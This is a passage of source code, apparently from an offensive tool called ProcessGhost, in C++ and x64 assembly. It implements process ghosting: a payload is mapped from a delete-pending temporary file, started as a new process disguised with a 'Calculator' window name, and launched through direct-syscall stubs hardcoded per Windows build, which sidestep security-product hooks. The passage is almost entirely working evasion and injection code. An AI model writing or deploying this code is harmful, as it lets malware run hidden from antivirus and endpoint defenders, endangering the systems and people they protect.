230 | 		std::cout << "Cannot update Params!" << std::endl;
231 | 		return false;
232 | 	}
233 | 	return true;
234 | }
235 | 
236 | bool setup_process_parameters(HANDLE hProcess, PROCESS_BASIC_INFORMATION& pi, LPWSTR targetPath)
237 | {
238 | 	//---
239 | 	UNICODE_STRING uTargetPath = { 0 };
240 | 	RtlInitUnicodeString(&uTargetPath, targetPath);
241 | 	//---
242 | 	wchar_t dirPath[MAX_PATH] = { 0 };
243 | 	get_directory(targetPath, dirPath, MAX_PATH);
244 | 	//if the directory is empty, set the current one
245 | 	if (wcsnlen(dirPath, MAX_PATH) == 0) {
246 | 		GetCurrentDirectoryW(MAX_PATH, dirPath);
247 | 	}
248 | 	UNICODE_STRING uCurrentDir = { 0 };
249 | 	RtlInitUnicodeString(&uCurrentDir, dirPath);
250 | 	//---
251 | 	wchar_t dllDir[] = L"C:\\Windows\\System32";
252 | 	UNICODE_STRING uDllDir = { 0 };
253 | 	RtlInitUnicodeString(&uDllDir, dllDir);
254 | 	//---
255 | 	UNICODE_STRING uWindowName = { 0 };
256 | 	wchar_t* windowName = (LPWSTR)L"Calculator";
257 | 	RtlInitUnicodeString(&uWindowName, windowName);
258 | 
259 | 	LPVOID environment;
260 | 	CreateEnvironmentBlock(&environment, NULL, TRUE);
261 | 
262 | 	PRTL_USER_PROCESS_PARAMETERS params = nullptr;
263 | 	NTSTATUS status = RtlCreateProcessParametersEx(
264 | 		&params,
265 | 		(PUNICODE_STRING)&uTargetPath,
266 | 		(PUNICODE_STRING)&uDllDir,
267 | 		(PUNICODE_STRING)&uCurrentDir,
268 | 		(PUNICODE_STRING)&uTargetPath,
269 | 		environment,
270 | 		(PUNICODE_STRING)&uWindowName,
271 | 		nullptr,
272 | 		nullptr,
273 | 		nullptr,
274 | 		RTL_USER_PROC_PARAMS_NORMALIZED
275 | 	);
276 | 	if (status != STATUS_SUCCESS) {
277 | 		std::cerr << "RtlCreateProcessParametersEx failed" << std::endl;
278 | 		return false;
279 | 	}
280 | 	LPVOID remote_params = write_params_into_process(hProcess, params, PAGE_READWRITE);
281 | 	if (!remote_params) {
282 | 		std::cout << "[+] Cannot make a remote copy of parameters: " << GetLastError() << std::endl;
283 | 		return false;
284 | 	}
285 | #ifdef _DEBUG
286 | 	std::cout << "[+] Parameters mapped!" << std::endl;
287 | #endif
288 | 	PEB peb_copy = { 0 };
289 | 	if (!buffer_remote_peb(hProcess, pi, peb_copy)) {
290 | 		return false;
291 | 	}
292 | 
293 | 	if (!set_params_in_peb(remote_params, hProcess, pi)) {
294 | 		std::cout << "[+] Cannot update PEB: " << GetLastError() << std::endl;
295 | 		return false;
296 | 	}
297 | #ifdef _DEBUG
298 | 	if (!buffer_remote_peb(hProcess, pi, peb_copy)) {
299 | 		return false;
300 | 	}
301 | 	std::cout << "> ProcessParameters addr: " << peb_copy.ProcessParameters << std::endl;
302 | #endif
303 | 	return true;
304 | }
305 | 
306 | 
307 | 
308 | bool process_ghost(wchar_t* targetPath, BYTE* payladBuf, DWORD payloadSize)
309 | {
310 | 	wchar_t dummy_name[MAX_PATH] = { 0 };
311 | 	wchar_t temp_path[MAX_PATH] = { 0 };
312 | 	DWORD size = GetTempPathW(MAX_PATH, temp_path);
313 | 	GetTempFileNameW(temp_path, L"TH", 0, dummy_name);
314 | 
315 | 	HANDLE hSection = make_section_from_delete_pending_file(dummy_name, payladBuf, payloadSize);
316 | 	if (!hSection || hSection == INVALID_HANDLE_VALUE) {
317 | 		return false;
318 | 	}
319 | 	HANDLE hProcess = nullptr;
320 | 	NTSTATUS status = NtCreateProcessEx(
321 | 		&hProcess,
322 | 		PROCESS_ALL_ACCESS,
323 | 		NULL,
324 | 		NtCurrentProcess(),
325 | 		PS_INHERIT_HANDLES,
326 | 		hSection,
327 | 		NULL,
328 | 		NULL,
329 | 		FALSE
330 | 	);
331 | 	if (status != STATUS_SUCCESS) {
332 | 		cerr << "NtCreateProcessEx failed! Status: " << hex << status << endl;
333 | 		if (status == STATUS_IMAGE_MACHINE_TYPE_MISMATCH) {
334 | 			cerr << "[!] The payload has mismatching bitness!" << endl;
335 | 		}
336 | 		return false;
337 | 	}
338 | 	PROCESS_BASIC_INFORMATION pi = { 0 };
339 | 	DWORD ReturnLength = 0;
340 | 	status = NtQueryInformationProcess(
341 | 		hProcess,
342 | 		ProcessBasicInformation,
343 | 		&pi,
344 | 		sizeof(PROCESS_BASIC_INFORMATION),
345 | 		&ReturnLength
346 | 	);
347 | 	if (status != STATUS_SUCCESS) {
348 | 		std::cerr << "NtQueryInformationProcess failed" << std::endl;
349 | 		return false;
350 | 	}
351 | 	PEB peb_copy = { 0 };
352 | 	if (!buffer_remote_peb(hProcess, pi, peb_copy)) {
353 | 		return false;
354 | 	}
355 | 	ULONGLONG imageBase = (ULONGLONG)peb_copy.ImageBaseAddress;
356 | 	DWORD payload_ep = get_entry_point_rva(payladBuf);
357 | 	ULONGLONG procEntry = payload_ep + imageBase;
358 | 	if (!setup_process_parameters(hProcess, pi, targetPath)) {
359 | 		std::cerr << "Parameters setup failed" << std::endl;
360 | 		return false;
361 | 	}
362 | 	HANDLE hThread = NULL;
363 | 	status = NtCreateThreadEx(&hThread,
364 | 		THREAD_ALL_ACCESS,
365 | 		NULL,
366 | 		hProcess,
367 | 		(LPTHREAD_START_ROUTINE)procEntry,
368 | 		NULL,
369 | 		FALSE,
370 | 		0,
371 | 		0,
372 | 		0,
373 | 		NULL
374 | 	);
375 | 
376 | 	if (status != STATUS_SUCCESS) {
377 | 		std::cerr << "NtCreateThreadEx failed: " << GetLastError() << std::endl;
378 | 		return false;
379 | 	}
380 | 
381 | 	return true;
382 | }


--------------------------------------------------------------------------------
/ProcessGhost/syscall.asm:
--------------------------------------------------------------------------------
  1 | .code
  2 | 
  3 | NtCreateProcessEx PROC
  4 | 	mov rax, gs:[60h]                       ; Load PEB into RAX.
  5 | NtCreateProcessEx_Check_X_X_XXXX:               ; Check major version.
  6 | 	cmp dword ptr [rax+118h], 5
  7 | 	je  NtCreateProcessEx_SystemCall_5_X_XXXX
  8 | 	cmp dword ptr [rax+118h], 6
  9 | 	je  NtCreateProcessEx_Check_6_X_XXXX
 10 | 	cmp dword ptr [rax+118h], 10
 11 | 	je  NtCreateProcessEx_Check_10_0_XXXX
 12 | 	jmp NtCreateProcessEx_SystemCall_Unknown
 13 | NtCreateProcessEx_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
 14 | 	cmp dword ptr [rax+11ch], 0
 15 | 	je  NtCreateProcessEx_Check_6_0_XXXX
 16 | 	cmp dword ptr [rax+11ch], 1
 17 | 	je  NtCreateProcessEx_Check_6_1_XXXX
 18 | 	cmp dword ptr [rax+11ch], 2
 19 | 	je  NtCreateProcessEx_SystemCall_6_2_XXXX
 20 | 	cmp dword ptr [rax+11ch], 3
 21 | 	je  NtCreateProcessEx_SystemCall_6_3_XXXX
 22 | 	jmp NtCreateProcessEx_SystemCall_Unknown
 23 | NtCreateProcessEx_Check_6_0_XXXX:               ; Check build number for Windows Vista.
 24 | 	cmp word ptr [rax+120h], 6000
 25 | 	je  NtCreateProcessEx_SystemCall_6_0_6000
 26 | 	cmp word ptr [rax+120h], 6001
 27 | 	je  NtCreateProcessEx_SystemCall_6_0_6001
 28 | 	cmp word ptr [rax+120h], 6002
 29 | 	je  NtCreateProcessEx_SystemCall_6_0_6002
 30 | 	jmp NtCreateProcessEx_SystemCall_Unknown
 31 | NtCreateProcessEx_Check_6_1_XXXX:               ; Check build number for Windows 7.
 32 | 	cmp word ptr [rax+120h], 7600
 33 | 	je  NtCreateProcessEx_SystemCall_6_1_7600
 34 | 	cmp word ptr [rax+120h], 7601
 35 | 	je  NtCreateProcessEx_SystemCall_6_1_7601
 36 | 	jmp NtCreateProcessEx_SystemCall_Unknown
 37 | NtCreateProcessEx_Check_10_0_XXXX:              ; Check build number for Windows 10.
 38 | 	cmp word ptr [rax+120h], 10240
 39 | 	je  NtCreateProcessEx_SystemCall_10_0_10240
 40 | 	cmp word ptr [rax+120h], 10586
 41 | 	je  NtCreateProcessEx_SystemCall_10_0_10586
 42 | 	cmp word ptr [rax+120h], 14393
 43 | 	je  NtCreateProcessEx_SystemCall_10_0_14393
 44 | 	cmp word ptr [rax+120h], 15063
 45 | 	je  NtCreateProcessEx_SystemCall_10_0_15063
 46 | 	cmp word ptr [rax+120h], 16299
 47 | 	je  NtCreateProcessEx_SystemCall_10_0_16299
 48 | 	cmp word ptr [rax+120h], 17134
 49 | 	je  NtCreateProcessEx_SystemCall_10_0_17134
 50 | 	cmp word ptr [rax+120h], 17763
 51 | 	je  NtCreateProcessEx_SystemCall_10_0_17763
 52 | 	cmp word ptr [rax+120h], 18362
 53 | 	je  NtCreateProcessEx_SystemCall_10_0_18362
 54 | 	cmp word ptr [rax+120h], 18363
 55 | 	je  NtCreateProcessEx_SystemCall_10_0_18363
 56 | 	cmp word ptr [rax+120h], 19041
 57 | 	je  NtCreateProcessEx_SystemCall_10_0_19041
 58 | 	cmp word ptr [rax+120h], 19042
 59 | 	je  NtCreateProcessEx_SystemCall_10_0_19042
 60 | 	cmp word ptr [rax+120h], 19043
 61 | 	je  NtCreateProcessEx_SystemCall_10_0_19043
 62 | 	jmp NtCreateProcessEx_SystemCall_Unknown
 63 | NtCreateProcessEx_SystemCall_5_X_XXXX:          ; Windows XP and Server 2003
 64 | 	mov eax, 004ah
 65 | 	jmp NtCreateProcessEx_Epilogue
 66 | NtCreateProcessEx_SystemCall_6_0_6000:          ; Windows Vista SP0
 67 | 	mov eax, 004ah
 68 | 	jmp NtCreateProcessEx_Epilogue
 69 | NtCreateProcessEx_SystemCall_6_0_6001:          ; Windows Vista SP1 and Server 2008 SP0
 70 | 	mov eax, 004ah
 71 | 	jmp NtCreateProcessEx_Epilogue
 72 | NtCreateProcessEx_SystemCall_6_0_6002:          ; Windows Vista SP2 and Server 2008 SP2
 73 | 	mov eax, 004ah
 74 | 	jmp NtCreateProcessEx_Epilogue
 75 | NtCreateProcessEx_SystemCall_6_1_7600:          ; Windows 7 SP0
 76 | 	mov eax, 004ah
 77 | 	jmp NtCreateProcessEx_Epilogue
 78 | NtCreateProcessEx_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
 79 | 	mov eax, 004ah
 80 | 	jmp NtCreateProcessEx_Epilogue
 81 | NtCreateProcessEx_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
 82 | 	mov eax, 004bh
 83 | 	jmp NtCreateProcessEx_Epilogue
 84 | NtCreateProcessEx_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
 85 | 	mov eax, 004ch
 86 | 	jmp NtCreateProcessEx_Epilogue
 87 | NtCreateProcessEx_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
 88 | 	mov eax, 004dh
 89 | 	jmp NtCreateProcessEx_Epilogue
 90 | NtCreateProcessEx_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
 91 | 	mov eax, 004dh
 92 | 	jmp NtCreateProcessEx_Epilogue
 93 | NtCreateProcessEx_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
 94 | 	mov eax, 004dh
 95 | 	jmp NtCreateProcessEx_Epilogue
 96 | NtCreateProcessEx_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
 97 | 	mov eax, 004dh
 98 | 	jmp NtCreateProcessEx_Epilogue
 99 | NtCreateProcessEx_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
100 | 	mov eax, 004dh
101 | 	jmp NtCreateProcessEx_Epilogue
102 | NtCreateProcessEx_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
103 | 	mov eax, 004dh
104 | 	jmp NtCreateProcessEx_Epilogue
105 | NtCreateProcessEx_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
106 | 	mov eax, 004dh
107 | 	jmp NtCreateProcessEx_Epilogue
108 | NtCreateProcessEx_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
109 | 	mov eax, 004dh
110 | 	jmp NtCreateProcessEx_Epilogue
111 | NtCreateProcessEx_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
112 | 	mov eax, 004dh
113 | 	jmp NtCreateProcessEx_Epilogue
114 | NtCreateProcessEx_SystemCall_10_0_19041:        ; Windows 10.0.19041 (2004)
115 | 	mov eax, 004dh
116 | 	jmp NtCreateProcessEx_Epilogue
117 | NtCreateProcessEx_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
118 | 	mov eax, 004dh
119 | 	jmp NtCreateProcessEx_Epilogue
120 | NtCreateProcessEx_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
121 | 	mov eax, 004dh
122 | 	jmp NtCreateProcessEx_Epilogue
123 | NtCreateProcessEx_SystemCall_Unknown:           ; Unknown/unsupported version.
124 | 	ret
125 | NtCreateProcessEx_Epilogue:
126 | 	mov r10, rcx
127 | 	syscall
128 | 	ret
129 | NtCreateProcessEx ENDP
130 | 
131 | NtCreateThreadEx PROC
132 | 	mov rax, gs:[60h]                      ; Load PEB into RAX.
133 | NtCreateThreadEx_Check_X_X_XXXX:               ; Check major version.
134 | 	cmp dword ptr [rax+118h], 6
135 | 	je  NtCreateThreadEx_Check_6_X_XXXX
136 | 	cmp dword ptr [rax+118h], 10
137 | 	je  NtCreateThreadEx_Check_10_0_XXXX
138 | 	jmp NtCreateThreadEx_SystemCall_Unknown
139 | NtCreateThreadEx_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
140 | 	cmp dword ptr [rax+11ch], 0
141 | 	je  NtCreateThreadEx_Check_6_0_XXXX
142 | 	cmp dword ptr [rax+11ch], 1
143 | 	je  NtCreateThreadEx_Check_6_1_XXXX
144 | 	cmp dword ptr [rax+11ch], 2
145 | 	je  NtCreateThreadEx_SystemCall_6_2_XXXX
146 | 	cmp dword ptr [rax+11ch], 3
147 | 	je  NtCreateThreadEx_SystemCall_6_3_XXXX
148 | 	jmp NtCreateThreadEx_SystemCall_Unknown
149 | NtCreateThreadEx_Check_6_0_XXXX:               ; Check build number for Windows Vista.
150 | 	cmp word ptr [rax+120h], 6000
151 | 	je  NtCreateThreadEx_SystemCall_6_0_6000
152 | 	cmp word ptr [rax+120h], 6001
153 | 	je  NtCreateThreadEx_SystemCall_6_0_6001
154 | 	cmp word ptr [rax+120h], 6002
155 | 	je  NtCreateThreadEx_SystemCall_6_0_6002
156 | 	jmp NtCreateThreadEx_SystemCall_Unknown
157 | NtCreateThreadEx_Check_6_1_XXXX:               ; Check build number for Windows 7.
158 | 	cmp word ptr [rax+120h], 7600
159 | 	je  NtCreateThreadEx_SystemCall_6_1_7600
160 | 	cmp word ptr [rax+120h], 7601
161 | 	je  NtCreateThreadEx_SystemCall_6_1_7601
162 | 	jmp NtCreateThreadEx_SystemCall_Unknown
163 | NtCreateThreadEx_Check_10_0_XXXX:              ; Check build number for Windows 10.
164 | 	cmp word ptr [rax+120h], 10240
165 | 	je  NtCreateThreadEx_SystemCall_10_0_10240
166 | 	cmp word ptr [rax+120h], 10586
167 | 	je  NtCreateThreadEx_SystemCall_10_0_10586
168 | 	cmp word ptr [rax+120h], 14393
169 | 	je  NtCreateThreadEx_SystemCall_10_0_14393
170 | 	cmp word ptr [rax+120h], 15063
171 | 	je  NtCreateThreadEx_SystemCall_10_0_15063
172 | 	cmp word ptr [rax+120h], 16299
173 | 	je  NtCreateThreadEx_SystemCall_10_0_16299
174 | 	cmp word ptr [rax+120h], 17134
175 | 	je  NtCreateThreadEx_SystemCall_10_0_17134
176 | 	cmp word ptr [rax+120h], 17763
177 | 	je  NtCreateThreadEx_SystemCall_10_0_17763
178 | 	cmp word ptr [rax+120h], 18362
179 | 	je  NtCreateThreadEx_SystemCall_10_0_18362
180 | 	cmp word ptr [rax+120h], 18363
181 | 	je  NtCreateThreadEx_SystemCall_10_0_18363
182 | 	cmp word ptr [rax+120h], 19041
183 | 	je  NtCreateThreadEx_SystemCall_10_0_19041
184 | 	cmp word ptr [rax+120h], 19042
185 | 	je  NtCreateThreadEx_SystemCall_10_0_19042
186 | 	cmp word ptr [rax+120h], 19043
187 | 	je  NtCreateThreadEx_SystemCall_10_0_19043
188 | 	jmp NtCreateThreadEx_SystemCall_Unknown
189 | NtCreateThreadEx_SystemCall_6_0_6000:          ; Windows Vista SP0
190 | 	mov eax, 00a7h
191 | 	jmp NtCreateThreadEx_Epilogue
192 | NtCreateThreadEx_SystemCall_6_0_6001:          ; Windows Vista SP1 and Server 2008 SP0
193 | 	mov eax, 00a5h
194 | 	jmp NtCreateThreadEx_Epilogue
195 | NtCreateThreadEx_SystemCall_6_0_6002:          ; Windows Vista SP2 and Server 2008 SP2
196 | 	mov eax, 00a5h
197 | 	jmp NtCreateThreadEx_Epilogue
198 | NtCreateThreadEx_SystemCall_6_1_7600:          ; Windows 7 SP0
199 | 	mov eax, 00a5h
200 | 	jmp NtCreateThreadEx_Epilogue
201 | NtCreateThreadEx_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
202 | 	mov eax, 00a5h
203 | 	jmp NtCreateThreadEx_Epilogue
204 | NtCreateThreadEx_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
205 | 	mov eax, 00afh
206 | 	jmp NtCreateThreadEx_Epilogue
207 | NtCreateThreadEx_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
208 | 	mov eax, 00b0h
209 | 	jmp NtCreateThreadEx_Epilogue
210 | NtCreateThreadEx_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
211 | 	mov eax, 00b3h
212 | 	jmp NtCreateThreadEx_Epilogue
213 | NtCreateThreadEx_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
214 | 	mov eax, 00b4h
215 | 	jmp NtCreateThreadEx_Epilogue
216 | NtCreateThreadEx_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
217 | 	mov eax, 00b6h
218 | 	jmp NtCreateThreadEx_Epilogue
219 | NtCreateThreadEx_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
220 | 	mov eax, 00b9h
221 | 	jmp NtCreateThreadEx_Epilogue
222 | NtCreateThreadEx_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
223 | 	mov eax, 00bah
224 | 	jmp NtCreateThreadEx_Epilogue
225 | NtCreateThreadEx_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
226 | 	mov eax, 00bbh
227 | 	jmp NtCreateThreadEx_Epilogue
228 | NtCreateThreadEx_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
229 | 	mov eax, 00bch
230 | 	jmp NtCreateThreadEx_Epilogue
231 | NtCreateThreadEx_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
232 | 	mov eax, 00bdh
233 | 	jmp NtCreateThreadEx_Epilogue
234 | NtCreateThreadEx_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
235 | 	mov eax, 00bdh
236 | 	jmp NtCreateThreadEx_Epilogue
237 | NtCreateThreadEx_SystemCall_10_0_19041:        ; Windows 10.0.19041 (2004)
238 | 	mov eax, 00c1h
239 | 	jmp NtCreateThreadEx_Epilogue
240 | NtCreateThreadEx_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
241 | 	mov eax, 00c1h
242 | 	jmp NtCreateThreadEx_Epilogue
243 | NtCreateThreadEx_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
244 | 	mov eax, 00c1h
245 | 	jmp NtCreateThreadEx_Epilogue
246 | NtCreateThreadEx_SystemCall_Unknown:           ; Unknown/unsupported version.
247 | 	ret
248 | NtCreateThreadEx_Epilogue:
249 | 	mov r10, rcx
250 | 	syscall
251 | 	ret
252 | NtCreateThreadEx ENDP
253 | 
254 | NtProtectVirtualMemory PROC
255 | 	mov rax, gs:[60h]                            ; Load PEB into RAX.
256 | NtProtectVirtualMemory_Check_X_X_XXXX:               ; Check major version.
257 | 	cmp dword ptr [rax+118h], 5
258 | 	je  NtProtectVirtualMemory_SystemCall_5_X_XXXX
259 | 	cmp dword ptr [rax+118h], 6
260 | 	je  NtProtectVirtualMemory_Check_6_X_XXXX
261 | 	cmp dword ptr [rax+118h], 10
262 | 	je  NtProtectVirtualMemory_Check_10_0_XXXX
263 | 	jmp NtProtectVirtualMemory_SystemCall_Unknown
264 | NtProtectVirtualMemory_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
265 | 	cmp dword ptr [rax+11ch], 0
266 | 	je  NtProtectVirtualMemory_Check_6_0_XXXX
267 | 	cmp dword ptr [rax+11ch], 1
268 | 	je  NtProtectVirtualMemory_Check_6_1_XXXX
269 | 	cmp dword ptr [rax+11ch], 2
270 | 	je  NtProtectVirtualMemory_SystemCall_6_2_XXXX
271 | 	cmp dword ptr [rax+11ch], 3
272 | 	je  NtProtectVirtualMemory_SystemCall_6_3_XXXX
273 | 	jmp NtProtectVirtualMemory_SystemCall_Unknown
274 | NtProtectVirtualMemory_Check_6_0_XXXX:               ; Check build number for Windows Vista.
275 | 	cmp word ptr [rax+120h], 6000
276 | 	je  NtProtectVirtualMemory_SystemCall_6_0_6000
277 | 	cmp word ptr [rax+120h], 6001
278 | 	je  NtProtectVirtualMemory_SystemCall_6_0_6001
279 | 	cmp word ptr [rax+120h], 6002
280 | 	je  NtProtectVirtualMemory_SystemCall_6_0_6002
281 | 	jmp NtProtectVirtualMemory_SystemCall_Unknown
282 | NtProtectVirtualMemory_Check_6_1_XXXX:               ; Check build number for Windows 7.
283 | 	cmp word ptr [rax+120h], 7600
284 | 	je  NtProtectVirtualMemory_SystemCall_6_1_7600
285 | 	cmp word ptr [rax+120h], 7601
286 | 	je  NtProtectVirtualMemory_SystemCall_6_1_7601
287 | 	jmp NtProtectVirtualMemory_SystemCall_Unknown
288 | NtProtectVirtualMemory_Check_10_0_XXXX:              ; Check build number for Windows 10.
289 | 	cmp word ptr [rax+120h], 10240
290 | 	je  NtProtectVirtualMemory_SystemCall_10_0_10240
291 | 	cmp word ptr [rax+120h], 10586
292 | 	je  NtProtectVirtualMemory_SystemCall_10_0_10586
293 | 	cmp word ptr [rax+120h], 14393
294 | 	je  NtProtectVirtualMemory_SystemCall_10_0_14393
295 | 	cmp word ptr [rax+120h], 15063
296 | 	je  NtProtectVirtualMemory_SystemCall_10_0_15063
297 | 	cmp word ptr [rax+120h], 16299
298 | 	je  NtProtectVirtualMemory_SystemCall_10_0_16299
299 | 	cmp word ptr [rax+120h], 17134
300 | 	je  NtProtectVirtualMemory_SystemCall_10_0_17134
301 | 	cmp word ptr [rax+120h], 17763
302 | 	je  NtProtectVirtualMemory_SystemCall_10_0_17763
303 | 	cmp word ptr [rax+120h], 18362
304 | 	je  NtProtectVirtualMemory_SystemCall_10_0_18362
305 | 	cmp word ptr [rax+120h], 18363
306 | 	je  NtProtectVirtualMemory_SystemCall_10_0_18363
307 | 	cmp word ptr [rax+120h], 19041
308 | 	je  NtProtectVirtualMemory_SystemCall_10_0_19041
309 | 	cmp word ptr [rax+120h], 19042
310 | 	je  NtProtectVirtualMemory_SystemCall_10_0_19042
311 | 	cmp word ptr [rax+120h], 19043
312 | 	je  NtProtectVirtualMemory_SystemCall_10_0_19043
313 | 	jmp NtProtectVirtualMemory_SystemCall_Unknown
314 | NtProtectVirtualMemory_SystemCall_5_X_XXXX:          ; Windows XP and Server 2003
315 | 	mov eax, 004dh
316 | 	jmp NtProtectVirtualMemory_Epilogue
317 | NtProtectVirtualMemory_SystemCall_6_0_6000:          ; Windows Vista SP0
318 | 	mov eax, 004dh
319 | 	jmp NtProtectVirtualMemory_Epilogue
320 | NtProtectVirtualMemory_SystemCall_6_0_6001:          ; Windows Vista SP1 and Server 2008 SP0
321 | 	mov eax, 004dh
322 | 	jmp NtProtectVirtualMemory_Epilogue
323 | NtProtectVirtualMemory_SystemCall_6_0_6002:          ; Windows Vista SP2 and Server 2008 SP2
324 | 	mov eax, 004dh
325 | 	jmp NtProtectVirtualMemory_Epilogue
326 | NtProtectVirtualMemory_SystemCall_6_1_7600:          ; Windows 7 SP0
327 | 	mov eax, 004dh
328 | 	jmp NtProtectVirtualMemory_Epilogue
329 | NtProtectVirtualMemory_SystemCall_6_1_7601:          ; Windows 7 SP1 and Server 2008 R2 SP0
330 | 	mov eax, 004dh
331 | 	jmp NtProtectVirtualMemory_Epilogue
332 | NtProtectVirtualMemory_SystemCall_6_2_XXXX:          ; Windows 8 and Server 2012
333 | 	mov eax, 004eh
334 | 	jmp NtProtectVirtualMemory_Epilogue
335 | NtProtectVirtualMemory_SystemCall_6_3_XXXX:          ; Windows 8.1 and Server 2012 R2
336 | 	mov eax, 004fh
337 | 	jmp NtProtectVirtualMemory_Epilogue
338 | NtProtectVirtualMemory_SystemCall_10_0_10240:        ; Windows 10.0.10240 (1507)
339 | 	mov eax, 0050h
340 | 	jmp NtProtectVirtualMemory_Epilogue
341 | NtProtectVirtualMemory_SystemCall_10_0_10586:        ; Windows 10.0.10586 (1511)
342 | 	mov eax, 0050h
343 | 	jmp NtProtectVirtualMemory_Epilogue
344 | NtProtectVirtualMemory_SystemCall_10_0_14393:        ; Windows 10.0.14393 (1607)
345 | 	mov eax, 0050h
346 | 	jmp NtProtectVirtualMemory_Epilogue
347 | NtProtectVirtualMemory_SystemCall_10_0_15063:        ; Windows 10.0.15063 (1703)
348 | 	mov eax, 0050h
349 | 	jmp NtProtectVirtualMemory_Epilogue
350 | NtProtectVirtualMemory_SystemCall_10_0_16299:        ; Windows 10.0.16299 (1709)
351 | 	mov eax, 0050h
352 | 	jmp NtProtectVirtualMemory_Epilogue
353 | NtProtectVirtualMemory_SystemCall_10_0_17134:        ; Windows 10.0.17134 (1803)
354 | 	mov eax, 0050h
355 | 	jmp NtProtectVirtualMemory_Epilogue
356 | NtProtectVirtualMemory_SystemCall_10_0_17763:        ; Windows 10.0.17763 (1809)
357 | 	mov eax, 0050h
358 | 	jmp NtProtectVirtualMemory_Epilogue
359 | NtProtectVirtualMemory_SystemCall_10_0_18362:        ; Windows 10.0.18362 (1903)
360 | 	mov eax, 0050h
361 | 	jmp NtProtectVirtualMemory_Epilogue
362 | NtProtectVirtualMemory_SystemCall_10_0_18363:        ; Windows 10.0.18363 (1909)
363 | 	mov eax, 0050h
364 | 	jmp NtProtectVirtualMemory_Epilogue
365 | NtProtectVirtualMemory_SystemCall_10_0_19041:        ; Windows 10.0.19041 (2004)
366 | 	mov eax, 0050h
367 | 	jmp NtProtectVirtualMemory_Epilogue
368 | NtProtectVirtualMemory_SystemCall_10_0_19042:        ; Windows 10.0.19042 (20H2)
369 | 	mov eax, 0050h
370 | 	jmp NtProtectVirtualMemory_Epilogue
371 | NtProtectVirtualMemory_SystemCall_10_0_19043:        ; Windows 10.0.19043 (21H1)
372 | 	mov eax, 0050h
373 | 	jmp NtProtectVirtualMemory_Epilogue
374 | NtProtectVirtualMemory_SystemCall_Unknown:           ; Unknown/unsupported version.
375 | 	ret
376 | NtProtectVirtualMemory_Epilogue:
377 | 	mov r10, rcx
378 | 	syscall
379 | 	ret
380 | NtProtectVirtualMemory ENDP
381 | 
382 | NtWriteVirtualMemory PROC
383 | 	mov rax, gs:[60h]                          ; Load PEB into RAX.
384 | NtWriteVirtualMemory_Check_X_X_XXXX:               ; Check major version.
385 | 	cmp dword ptr [rax+118h], 5
386 | 	je  NtWriteVirtualMemory_SystemCall_5_X_XXXX
387 | 	cmp dword ptr [rax+118h], 6
388 | 	je  NtWriteVirtualMemory_Check_6_X_XXXX
389 | 	cmp dword ptr [rax+118h], 10
390 | 	je  NtWriteVirtualMemory_Check_10_0_XXXX
391 | 	jmp NtWriteVirtualMemory_SystemCall_Unknown
392 | NtWriteVirtualMemory_Check_6_X_XXXX:               ; Check minor version for Windows Vista/7/8.
393 | 	cmp dword ptr [rax+11ch], 0
394 | 	je  NtWriteVirtualMemory_Check_6_0_XXXX
395 | 	cmp dword ptr [rax+11ch], 1
396 | 	je  NtWriteVirtualMemory_Check_6_1_XXXX
397 | 	cmp dword ptr [rax+11ch], 2
398 | 	je  NtWriteVirtualMemory_SystemCall_6_2_XXXX
399 | 	cmp dword ptr [rax+11ch], 3
400 | 	je  NtWriteVirtualMemory_SystemCall_6_3_XXXX
401 | 	jmp NtWriteVirtualMemory_SystemCall_Unknown
402 | NtWriteVirtualMemory_Check_6_0_XXXX:               ; Check build number for Windows Vista.
403 | 	cmp word ptr [rax+120h], 6000
404 | 	je  NtWriteVirtualMemory_SystemCall_6_0_6000
405 | 	cmp word ptr [rax+120h], 6001
406 | 	je  NtWriteVirtualMemory_SystemCall_6_0_6001
407 | 	cmp word ptr [rax+120h], 6002
408 | 	je  NtWriteVirtualMemory_SystemCall_6_0_6002
409 | 	jmp NtWriteVirtualMemory_SystemCall_Unknown
410 | NtWriteVirtualMemory_Check_6_1_XXXX:               ; Check build number for Windows 7.
411 | 	cmp word ptr [rax+120h], 7600
412 | 	je  NtWriteVirtualMemory_SystemCall_6_1_7600
413 | 	cmp word ptr [rax+120h], 7601
414 | 	je  NtWriteVirtualMemory_SystemCall_6_1_7601
415 | 	jmp NtWriteVirtualMemory_SystemCall_Unknown
416 | NtWriteVirtualMemory_Check_10_0_XXXX:              ; Check build number for Windows 10.
417 | 	cmp word ptr [rax+120h], 10240
418 | 	je  NtWriteVirtualMemory_SystemCall_10_0_10240
419 | 	cmp word ptr [rax+120h], 10586
420 | 	je  NtWriteVirtualMemory_SystemCall_10_0_10586
421 | 	cmp word ptr [rax+120h], 14393
422 | 	je  NtWriteVirtualMemory_SystemCall_10_0_14393
423 | 	cmp word ptr [rax+120h], 15063
